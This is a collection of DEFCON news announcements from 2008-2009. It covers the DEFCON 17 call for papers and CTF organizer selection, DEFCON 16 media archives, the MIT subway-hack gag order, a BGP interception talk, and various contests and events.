More information that will follow via your registered email address. Bring all your l33t haxor skillz just leave your Kiddie toolz behind.
Vulc@n Difensiva
Senior Engineer
Diuntinus Defense Technologies, Inc.

==> DEFCON CNN Interview

https://www.defcon.org/defconrss.xml DEFCON's very own Russ Rogers was interviewed on CNN about the con and the motivations behind the Conficker Worm. Check it out!

==> New Format for DEFCON 15 & 16 Archives!

https://www.defcon.org/defconrss.xml Check out the new format for the DEFCON Archives! DC15 and DC16 have been converted, and the rest are being ported over as we speak! The new format combines links to Presentations in audio & video, Media RSS feeds, Conference Programs, Press from the show, and more into one easy page for each past DEFCON.
DEFCON 16 Archive: https://www.defcon.org/html/links/dc-archives/dc-16-archive.html
DEFCON 15 Archive: https://www.defcon.org/html/links/dc-archives/dc-15-archive.html
Check 'em out!

==> Redesigned DEFCON Site Beta is Live!

https://www.defcon.org/defconrss.xml The DEFCON website has been given a fresh new face, designed to deliver relevant content, inspire interaction within the community, and be more mobile friendly. We've released this beta to get feedback from you, the user, as we begin to flesh out the new features. Take a look around, on different browsers and devices, and if you like, report any bugs or voice suggestions to neil [at] defcon ]dot[ org. We're adding a few new items to the site, restructuring and expanding the archives section, and highlighting community news and events. Keep your eyes on the DEFCON RSS, Forums, Twitter, and/or LinkedIn Group for announcements as these features are completed and implemented.

==> The new DEFCON 17 CTF Organizers have spoken

https://www.defcon.org/defconrss.xml The newly chosen organizers of this year's CTF competition, Diutinus Defense Technologies, Inc., have broken their silence on the DEFCON Forums. You can view the post at https://forum.defcon.org/showthread.php?t=10246&page=3. They have also posted a website at http://www.ddtek.biz

==> And the new DEFCON 17 CTF Organizer is...

https://www.defcon.org/defconrss.xml The fine authors of Proposal #1 on the DEFCON 17 CTF Submissions Thread. We are not at liberty to divulge much more than this at this time, but you can read DT's announcement and keep your eyes peeled for new details at the aforementioned links!

==> Contest and Event Status for DEFCON 17

https://www.defcon.org/defconrss.xml It's going to be another great year of events and contests at DEFCON, the ideas are flying and some new players have emerged. A couple of new items for this year are DefCon 101: A Lurkers Guide to DefCon, and the DEFCON Geo Challenge. You can check out all of the latest contest and event info on the DEFCON 17 Official and Unofficial Events and Contests Forum.

==> DEFCON 17 CTF Proposals On the Forums!

https://www.defcon.org/defconrss.xml DT has sanitized and posted the CTF Proposal submissions on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=10246 to be viewed and commented on by the community. Check them out and weigh in on which one you think should be chosen for 2009!

==> DEFCON 16 Audio now available!

https://www.defcon.org/defconrss.xml I've started to upload all the audio and video from DEFCON 16! This year we are offering something new, a combo video file that has both the slides as well as the video of the speaker on the same screen. These files are big! If you just want to listen to a talk I suggest downloading the m4b audio files.. they are 1/2 the size of years past and will easily fit on your phone.. about 5 to 10 megs each. Audio files have finished uploading! https://www.defcon.org/podcast/defcon-16-audio.rss Video of just the presentation slides with audio are uploading now, should take a day or so to be available, then the combo video files will be uploaded. Let the leeching begin! Report any problems on this forum thread. The Dark Tangent

==> Submissions for CTF Organizers ends this weekend!

https://www.defcon.org/defconrss.xml Just a friendly reminder, if your group wants to set the bar to take the fame, and the massive challenge of being the next Capture the Flag Organizers for DEFCON, you must get your submissions in by this weekend! Good Luck! This thread on the DEFCON Forums has all the details!

==> DEFCON 17 Call For Papers is Open!

https://www.defcon.org/defconrss.xml DEF CON 17, Las Vegas 2009. July 31st - August 2nd. The Riviera Hotel and Casino, Las Vegas, Nevada, USA. https://www.defcon.org/
Call for Papers
Dark monks of techno-fu, it is that time of the year again! The DEFCON CFP is now open!
What: DEFCON 17 Call For Papers
When: The Call for Papers will close on May 15, 2009
How: Complete the Call for Papers Form and send to talks at defcon dot org
Don't know what DEFCON is? Go to www.defcon.org and clue up! Papers and presentations are now being accepted for DEFCON 17, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, July 31 - August 2, 2009. Two years ago we eliminated specific speaking tracks and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We will group presentations by subjects and come up with topic clusters of interest. It worked out so well in the past we are doing it again this year. What are we looking for then, if we don't have tracks? We're looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. 
Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouthful! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year. Check out https://www.defcon.org/html/defcon-16/dc-16-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, 0-day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, 1/2 day Thursday or a break out format of a length you determine. 
We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by Gran Master Ratt's Flame Crotch? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 17: NEW this year is a 1/2 day set of tracks on Thursday, pre-con, to help orient newbies and provide 1/2 day training on different 'foundational' subjects such as networking, building custom Linux distros, a work shop on modding your PSP, the fundamentals of radio, things like that. These sessions will get you in the mood for the main conference and give you something to do if you showed up early Thursday. 
As such your submissions for the Thursday sessions should be entertaining and help attendees who are fairly new get their feet under themselves, or give more advanced hacker types a half day of fun gutting their TiVo. If you want to present a 1/2 day training or newbie talk just make sure you mark down you want to present on Thursday. We have ALL the speaking rooms this year, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech: Complete the DEFCON 17 Call for Papers Form. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later than July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. 
After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 17. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> Call for DEFCON 17 Capture the Flag Organizers!

https://www.defcon.org/defconrss.xml WANTED: An evil large multinational corporation, or... A nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world TO: Host, recreate, and innovate the worlds most (in)famous hacking contest. WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies. Do you have what it takes and know what we're talking about? Go to https://forum.defcon.org/showthread.php?t=10130 for all the details!

==> Call for Updates: Unofficial DEFCON FAQ

https://www.defcon.org/defconrss.xml From HighWiz on the DEFCON Blogs: The original "Unofficial DefCon FAQ" wasn't the work of one single individual but a collaboration by many people. I view my role as more of an organizer of the information rather than the creator of it. Version 1.0 is seriously outdated, http://defcon.stotan.org/faq/ and in need of a refresh. So I figured I'd utilize this blog space to request feedback on version 2.0. To find out more and how to contribute, go to https://forum.defcon.org/blog.php?b=101

==> DEFCON Forums Now SSL Only

https://www.defcon.org/defconrss.xml Due to overwhelmingly positive feedback, the DEFCON Forums are now strictly SSL. This change has enabled us to utilize page compression, which was previously unavailable and which speeds up page delivery. It will also enhance security, since all sessions will now be encrypted. If you haven't already joined the DEFCON Forums, you should, it's a great place to keep in touch with the DEFCON community and to be a part of the discussion and planning leading up to the next DEFCON! Check it out at: forum.defcon.org

==> Subway Hackers Now Working with MBTA

https://www.defcon.org/defconrss.xml Well the dust has settled, and the lawsuit against three MIT students, who were to speak at DEFCON 16 about vulnerabilities in the Boston subway ticketing system, has been dropped. It seems now they will be working with the MBTA to help secure the ticketing systems. The researchers, who were federally gagged from speaking at DEFCON, were represented by the EFF and the gag order was dropped shortly after con. You can read the EFF press release at http://www.eff.org/press/archives/2008/12/22, and there is an article on the PCWorld site at http://www.pcworld.com/article/155903/with_lawsuit_settled_hackers_now_working_with_mbta.html

==> Order DEFCON 16 Presentation DVDs From The Source of Knowledge

https://www.defcon.org/defconrss.xml If you didn't make it out to DEFCON 16, or just wanted to refresh on some of the great presentations we had this year, you can order full DVD copies of all of the talks from The Source of Knowledge (TSOK) website. TSOK's SynchVue DVD Format is new and improved, combining video and audio of the speaker, as well as slide material in one! From TSOK website: SynchVue DVD-ROM + SessionVue Audio The SynchVue DVD-ROM is an incredible product which merges the live audio with the projected image. Whether it is a PowerPoint presentation, software demonstration, video or web page, all of it is captured and synchronized seamlessly with the audio from the presenter. Check it out at: https://www.sok-media.com/store/products.php?event=2008-DEFCON

==> Poll: Should DEFCON Forums go SSL Only?

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums and weigh in on whether or not they should only be accessible over an SSL connection. If you are a forums member, there is a handy poll in which you can vote. If you're not a member, SIGN UP! From DT on the DEFCON Forums: Hey everyone, I'd like everyone's input on switching forum.defcon.org over to SSL only. Brief background: The way we do redirection from http to https is a clever kludge Cot came up with, but it prevents us from using http compression, which would speed things up for everyone. Now that mobile devices have supported http compression for years we may as well take advantage of it, not to mention it would be like getting extra free capacity. With SSL only some of the XSS and related attacks would be more difficult and MITM concerns would almost vanish. The downside is some people might not be able to log in through proxies (I can over Tor, though), at free WiFi locations, etc. https://forum.defcon.org/showthread.php?t=9967

==> Defcon.org is Being Remodeled!

https://www.defcon.org/defconrss.xml It's all behind the scenes of course, but defcon.org is currently being re-worked a bit to enhance the community aspect of the site, refresh some of the older content, and become more mobile friendly. Keep an eye out over the next several weeks for changes and enhancements to the site!

==> Remaining DEFCON 16 Swag available at J!NX

https://www.defcon.org/defconrss.xml For those of you that couldn't make it to this year's DEFCON, or just didn't get a chance to stop by the Swag Booth, the remainder of this year's swag can now be purchased from J!NX. Check out the available styles at http://www.jinx.com/def_con?tcid=1, but hurry, sizes and styles are limited!

==> DEFCON Speakers in the News

https://www.defcon.org/defconrss.xml Tony Kapela, who blew minds by using flaws in BGP to intercept and re-route all of the DEFCON 16 network traffic, is the featured speaker at Black Hat's fourth free webcast. The webcast is entitled "Trust Doesn't Scale - Practical Hijacking on the World's Largest Network". It promises to be an interesting presentation. To find out more, go to https://www.blackhat.com/html/webinars/practicalhijacking.html. To register, you can go to http://w.on24.com/r.htm?e=115053&s=1&k=526FB59D2232E5EE4DF1A158DEA07277. The webcast will begin Thursday, October 16 at 1pm PST.

==> DEFCON Badge Designer Joe Grand's TV Show Premieres Wednesday Oct. 15!

https://www.defcon.org/defconrss.xml As many of you may know, the unique electronic badges for DEFCON (since DC14) are designed by the illustrious Joe "Kingpin" Grand. Formerly a member of the hacker group L0pht Heavy Industries and currently the brain behind Grand Idea Studios and The Kingpin Empire, Joe also has a new TV show called "Prototype This" premiering this Wednesday, October 15th on the Discovery Channel at 10pm eastern time. The premise -- A team of four super smart guys with varying electronics and engineering backgrounds come up with and prototype crazy one-of-a-kind inventions on the cutting edge of technology in a limited time frame. It seems like this could be a great introduction for many into the world of hardware hacking and design. We're looking forward to seeing what they come up with!
Upcoming Episode List:
- MIND CONTROLLED CAR - October 15 @ 10 e/p
- BOXING ROBOTS - October 22 @ 10 e/p
- TRAFFIC BUSTING TRUCK - October 29 @ 10 e/p
- GET UP AND GO - November 5 @ 10 e/p
- WATERSLIDE SIMULATOR - November 12 @ 10 e/p
- SIX-LEGGED ALL TERRAIN VEHICLE - November 19 @ 10 e/p
Some links about the show:
- http://dsc.discovery.com/tv/prototype-this/prototype-this.html - Discovery Channel Page for Prototype This
- http://en.wikipedia.org/wiki/Prototype_This - Wikipedia Entry
- http://news.cnet.com/8301-13772_3-10016485-52.html - CNet News Article

==> Early Release Video from DEFCON 16! Tool from talk released!

https://www.defcon.org/defconrss.xml We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats, the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is quicktime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months!
Brenno De Winter - Ticket to Trouble
media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble_full.mov
media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble.m4v
Dan Kaminsky - DNS Goodness
media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache_full.mov
media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache.m4v
Anton Kapela and Alex Pilosov - Stealing the Internet
media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov_full.mov
media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov.m4v
Mike Perry - 365 Day: Active HTTPS Cookie Hijacking
media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR_full.mov
media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR.m4v
Coincidentally, Slashdot reports that Mike Perry has released the tool from this talk today. You can find the article here: http://it.slashdot.org/it/08/09/09/1558218.shtml

==> DEFCON 16 Press Page Updated

https://www.defcon.org/defconrss.xml There were many press-worthy happenings at DEFCON 16 this year, from the MBTA controversy to the new way of exploiting BGP. We've collected many of the articles for you to peruse on the Past Media Coverage page. You can check it out at https://www.defcon.org/html/links/dc_press/dc_press.html. If you've noticed an article directly related to DEFCON 16 we might have missed, send the url to neil ]at[ defcon {dot} org and we'll post it.

==> BGP exploit causing quite a stir

https://www.defcon.org/defconrss.xml Although it has been known for over a decade, an exploit of the Border Gateway Protocol (BGP) recently re-entered the spotlight at DEFCON 16 in a presentation by Anton Kapela and Alex Pilosov. The presentation is entitled "Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack". You can read about the exploit on the Wired Threat level blog at http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html and you can download the slides from the presentation at https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

==> DEFCON 16 Presentations now online!

https://www.defcon.org/defconrss.xml Lose your DEFCON 16 CD? Looking for updated presentation materials? Did you just miss DEFCON 16 altogether? You're in luck! The presentation slides and extras from the DEFCON 16 CD, including updated presentations we have received thus far can now be downloaded on the DEFCON Media Archives page. Go to https://www.defcon.org/html/links/defcon-media-archives.html for all the goodies!

==> First Interview since silenced subway hacking talk

https://www.defcon.org/defconrss.xml Popular Mechanics has interviewed Zack Anderson, one of the silenced MIT Students who were to give the Anatomy of a Subway Hack talk at DEFCON 16. From Popular Mechanics: It's rare that a hacker convention makes national news, but three MIT students caused a whole lot of controversy when they planned a presentation about security holes in Boston's subway system for DefCon in Las Vegas earlier this month. They were forced to cancel the talk at the last minute by a 10-day federal restraining order, requested by Boston's Massachusetts Bay Transit Authority (MBTA). On Tuesday, a judge denied motions by the MBTA to issue a preliminary injunction aimed at keeping the students quiet for a further five months. Now, in his most extensive interview to date, MIT subway hacker Zack Anderson talks with PM about what's wrong with the Charlie Card, what happened at DefCon, and what it's like to tango with the FBI and the MBTA. Read more at: http://www.popularmechanics.com/technology/industry/4278892.html?page=1

==> MIT students gag order lifted!

https://www.defcon.org/defconrss.xml From CNET.com: BOSTON--The three Massachusetts Institute of Technology students who have been barred by a court order from discussing subway card vulnerabilities are now free to say what they want. In a ruling certain to be cheered by computer researchers, a federal judge here Tuesday let the 10-day-old gag order expire. U.S. District Judge George O'Toole Jr. refused to grant a preliminary injunction requested by the Massachusetts Bay Transportation Authority that would have blocked the students from talking about their findings until January 1, 2009. The MBTA's requested injunction would have replaced a temporary restraining order granted during the Defcon hacker conference, which under federal court rules automatically expires on Tuesday. Read more at: http://news.cnet.com/8301-1009_3-10020252-83.html?hhTest=1

==> Post DEFCON 16 items of note

https://www.defcon.org/defconrss.xml DEFCON 16 Receipt! For those of you that need a receipt for attending DEFCON 16, it can be downloaded from here: https://www.defcon.org/images/defcon-16/dc16_receipt.pdf Upload your Photos! Now that con has ended, get on over to pics.defcon.org and upload all of your awesome pics and videos from the show! We want to see them!

==> New Talk: Ticket to Trouble

https://www.defcon.org/defconrss.xml Brenno De Winter will be speaking Sunday on controversy surrounding hacks of the Belgian Subway system. The presentation will occur 13:00 to 13:50 in Track 3.

==> DEFCON 16 NEWS: MIT Students Gagged by Federal Court Judge

https://www.defcon.org/defconrss.xml The EFF announced today that they will represent 3 MIT students who were set to present at DEFCON 16 on Mass transit vulnerabilities. The students were forced to cancel their presentation on Sunday, due to a Federal Court Judge's Order. From eff.org: MIT Students Gagged by Federal Court Judge. EFF Backs Researchers Forced to Cancel Presentation on Transit Fare Payment System. Las Vegas - Three students at the Massachusetts Institute of Technology (MIT) were ordered this morning by a federal court judge to cancel their scheduled presentation about vulnerabilities in Boston's transit fare payment system, violating their First Amendment right to discuss their important research. (read more at: http://www.eff.org/press/archives/2008/08/09) To see what other press is happening at DEFCON 16, check out the DEFCON in the news thread at https://forum.defcon.org/showthread.php?p=98012#post98012

==> DEFCON Updates

https://www.defcon.org/defconrss.xml DEFCON 16 Capture the Flag is Coming! In just a couple of days, the ultimate battle will begin at DEFCON 16. That's right, we're talking about the DEFCON Capture the Flag Competition organized by Kenshoto! Eight Teams will unleash their best root-fu in the struggle for the coveted CTF Title! The following teams will be competing: 1@stPlace (returning champions), Routards, Pandas with Gambas, Guard@MyLan0, Shellphish, Taekwon-V, WOWHACKER, PLUS 4800. Head into CTF Room in Royale Pavilion to check out the action!
New Talk Added: Toying with Barcodes by Felix "FX" Lindner on Saturday at 17:00 in Track 1. Check it out at: https://www.defcon.org/html/defcon-16/dc-16-speakers.html#FX2

==> Don't Miss the TCP/IP Drinking Game!

https://www.defcon.org/defconrss.xml The annual must-see Defcon event of BGP, booze, and bemusement returns in this year's TCP/IP Drinking Game. Panelists will pit their trivia knowledge of network trivia against one another and the ever-present haze of inebriation for all to see. We promise that no RFC nor hepatic system will be spared. As always, solid audience participation is encouraged, so bring well-researched queries.* This year's event will be hosted by Adam J. O'Donnell, security researcher and provocateur. The usual M.C. of the TCP/IP drinking game, Dr. Mudge, is spending this year sober for tax purposes... see you next year with my new bionic liver :) ..mudge * Anyone asking about Windows 98 TCP/IP UIs will be promptly ejected. Friday @ 20:00 in Speaking Track 4

==> Stay in the loop with the DEFCON 16 Twitter feed!

https://www.defcon.org/defconrss.xml The vehicle of choice this year for up to the minute updates of breaking DEFCON news, announcements and so forth will be the DEFCON 16 Twitter feed. Sign up now at http://twitter.com and follow user defcon16 to keep up to date with this year's DEFCON! See news breaking? Send events of note at DEFCON 16 to defconupdates {at} gmail ]dot[ com so we can tell the world!

==> New Happenings at DEFCON 16

https://www.defcon.org/defconrss.xml Well folks, the time for the 16th installment of the hacking convention known as DEFCON draws near, and this year promises to be a great one! We've got more content than ever, including 5 full tracks of talks, demos, workshops, new contests, a new Hardware Hacking Village, and even a new EFF fundraiser to replace the dunk tank! Here is some of the goodness you can expect:
DAVIX Visualization Workshop
At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures! Get more info at: https://forum.defcon.org/forumdisplay.php?f=425
Mobile Hacker Spaces
Interested in visiting a Colorado Hacker Space here at DefCon 16? Check out the first ever Mobile Hacker Space, which will be parked in the outside chill out area during the convention. Try your hand against one of the challenges in the pentest lab, or learn from the web-based tutorials posted on the open network. Participation is encouraged, and presentations will be given every day from 2-4pm, which will provide a more hands-on look at how the Mobile Hacker Space operates and fits within published hacker space design patterns. Make sure you also attend the presentation on the history and design of the Colorado Springs Mobile Hacking Space on Sunday, at 1pm in Track One. Forums link: https://forum.defcon.org/forumdisplay.php?f=428
Quantum Spookshow
Quantum mechanics make possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Hours: 10:00-18:00 on Friday and Saturday, with Sunday closing around 16:00. Location: 114. Directly across from the Contest area.
EFF Fundraiser
This year we decided to replace our beloved Dunk Tank with something NEW! Hackers and Guns in Las Vegas. Ya gotta love it. You've seen it played out numerous times in movies and on TV. A flash bang grenade goes off. SWAT kicks in the door and moves quickly to differentiate between the good guys and the bad guys in the same room. How do they train to effectively recognize and take out the bad guys, while not wasting any of the hostages? One of the tools they use is a Firearms training Simulator or FATS system and someone was foolish enough to let us get our hands on one for DEFCON 16. So Calling all Shooters, FPS Gamers, Psycho Killers, and 1337 wannabes. Come on by and pop a cap in someone's VR bleep. We will be set up in room 115 across from the contest area and next door to the Quantum Spookshow from 10:00-20:00. See if you got the skillz to make it through the challenges unscathed. Then the next time you hear a knock at your door in the middle of the night - you'll be ready. More at: https://forum.defcon.org/forumdisplay.php?f=427

==> WarBallooning Demo at DEFCON 16!

https://www.defcon.org/defconrss.xml A WarBalloon, er... Airborne Surveillance & 802.11 Stumbling Platform, also known as the "Kismet Eye in the Sky" will be flying just outside the DEFCON convention center on FRI and SAT from 11AM - 2 PM. DEFCON Attendees: please note the Balloon & Electronics launch will occur Daily at 11:00 AM & several times during the day as we change antennas & recon. new targets. Read more at: https://forum.defcon.org/showthread.php?t=9613

==> The DEFCON Shoot is Back!

https://www.defcon.org/defconrss.xml From the DEFCON Shoot Page on Deviating.net: The DEFCON Shoot is a public event happening just prior to the DEFCON hacker conference in Las Vegas, Nevada. Anyone who wants to can show up and for a small fee make use of a private range located about 30 minutes outside of the city. There will be opportunities to see and possibly shoot some of the weapons belonging to your friends and it will also be possible to rent firearms (including Class-III full autos) from the range itself. In addition to having a number of terrific pieces of hardware on-site, the range is directly affiliated with Small Arms Review Magazine and thus has access to their nearly limitless archive of equipment. Anything from a WWII Bren Gun to a Vulcan Cannon-style Minigun is possible. As of right now, the event's ability to come off is contingent on participation... that means that we need you if we're going to make it happen. I have run the numbers, and I can acquire us private range time at a very sweet facility if we have about a little over two dozen people showing up, provided that about at least ten of them are interested in some full-automatic action. Read on for more details about location, pricing, etc. You can sign up on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=9574 You can get all the info at http://deviating.net/firearms/defcon_shoot/

==> DEFCON 16 Contest & Events Update!

https://www.defcon.org/defconrss.xml New DEFCON 16 Events/Contests: There are a few new happenings recently added to the mix that you might want to know about, such as the EEE PC Mod workshop, The Leetskills Talent Competition, as well as Buzzword Survivor, where you can win your share of $10k! Get all the up to the minute info at https://forum.defcon.org/forumdisplay.php?f=346 !
DEFCON 16 Black & White Ball: Acts Announced. Get ready for some hot DJ action kids! Zziks has posted a tentative lineup for the Black & White bleep and Daytime Chillout Area. Check them out as they evolve on the Forums at https://forum.defcon.org/showthread.php?t=9533 !

==> Mystery Box Wildcard Slot

https://www.defcon.org/defconrss.xml There will be one wildcard (walk-on) team allowed this year. Each year I have people asking about the contest after it is too late. This is my means of dealing with those people. Keep in mind that the first year Mystery Challenge ran a walk-on team won the competition. Friday morning I will be accepting intentions to compete. THIS MAY CHANGE TO THURSDAY NIGHT. If only one team shows for this position, it is theirs. If multiple teams show, there will be a mini-challenge race to determine who gets the spot. Anyone who intends to try for the walk on team should email me their intentions prior to con if possible (DC16MysteryChallenge [at] MysteryChallenge ]dot[ org). This will help me gauge the magnitude of the mini-challenge race, if necessary (and it just helps me get an idea of the number trying out). See you all in a few weeks. LosT

==> Seeking Contestants! Win your share of 10K!

https://www.defcon.org/defconrss.xml The wait is over. Buzzword survivor is here. The rules are simple, the money is real.
Rules: You sit and listen to 36 hours of straight vendor pitches
- No sleeping
- Eat what you want
- Bathroom breaks when you need them
- Stand and stretch when you need to, but you have to stay focused on the presenter.
Prize:
- 10 contestants
- Half the pot gets divided by all remaining contestants at the end.
- Half the pot gets divided 60, 30, 10 by 1st, 2nd, 3rd in test scores.
Prizes as of June 1, 2008 (assuming all 10 make it to the end). Pot could rise depending on number of sponsors.
- 1st: $3500
- 2nd: $1500
- 3rd: $750
- All others: $500
To become a contestant email: buzzwordsurvivor@gmail.com

==> Mystery Challenge registration closed

https://www.defcon.org/defconrss.xml Mystery Challenge registration is now closed. There will be 1 wildcard team allowed to sign up the first day of Defcon. Should multiple teams desire this position, there will be a mini-contest. Interested parties should email LosT with their intent to try for the wildcard slot.

==> DEFCON 16 Schedule now on-line!

https://www.defcon.org/defconrss.xml DEFCON 16 Schedule now on-line! We are proud to present the schedule of speakers and events for DEFCON 16! Thanks to all the new space available at the Riviera Hotel & Casino, we have even more room this year. 4 Full speaking tracks and an additional "Breakout" track filled with cool talks, demonstrations and workshops. We are pleased at our lineup, and the amazing list of speakers who really diversified the content this year. Link: http://defcon.org/html/defcon-16/dc-16-schedule.html Keep checking the website and schedule for changes, Contests & Event Schedules and Workshop room locations. This year is packed with more stuff to enjoy than any years prior and we hope you like it just as much as we do! See you at the show!

==> Mystery Challenge Reg Closing Sunday 6/29

https://www.defcon.org/defconrss.xml Mystery Challenge Registration will close this Sunday (6/29/08) at 11:59:59 PM. If you intend to register do it now. There should be sufficient information in the forums and on MysteryChallenge.org at this point. 1057

==> DEFCON Badge Hacking Contest!

https://www.defcon.org/defconrss.xml Recently announced at the DEFCON forums: The DEFCON Badge Hacking Contest awards the top 3 most ingenious, obscure, mischievous, obscene, or technologically astounding badge modifications created over the weekend. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product, and it exists for your hacking pleasure. We've had some amazing hacks in previous years. For info on the past badges and badge hacking contest entries, check out: http://www.grandideastudio.com/portf...fcon-15-badge/ http://www.grandideastudio.com/portf...fcon-14-badge/ This is the first year that it will be an official contest announced in advance, etc., as previously we've kept the whole thing under wraps until the first day of the con. For more info go to https://forum.defcon.org/showthread.php?t=9502

==> People's Choice voting is open for the DC16 Artwork Contest!

https://www.defcon.org/defconrss.xml Let the voting commence! Go to the DEFCON 16 Artwork Contest Public Gallery at https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770 to view this year's submissions. Once you have found your favorite go ahead and cast your vote at: https://forum.defcon.org/showthread.php?t=9497. Voting for the People's Choice category will run for one week, ending June 30th at 6pm. You will need a DEFCON Forums account to vote, so if you don't have one, sign up now at forum.defcon.org

==> Final round of DEFCON 16 Speakers chosen!

https://www.defcon.org/defconrss.xml This is it, Ladies and Germs, the last few DEFCON 16 speakers have been chosen and the Talk schedule is now in its final stages. Look for the DEFCON 16 Schedule page to be updated this week at https://www.defcon.org/html/defcon-16/dc-16-schedule.html. For now, check out the speaker page and see what these latest selections are all about!
Grendel-Scan: A new web application scanning tool - David Byrne, Eric Duprey
Comparison of File Infection on Windows & Linux - Iclee_vx
Anti-RE Techniques in DRM Code - Jan Newger
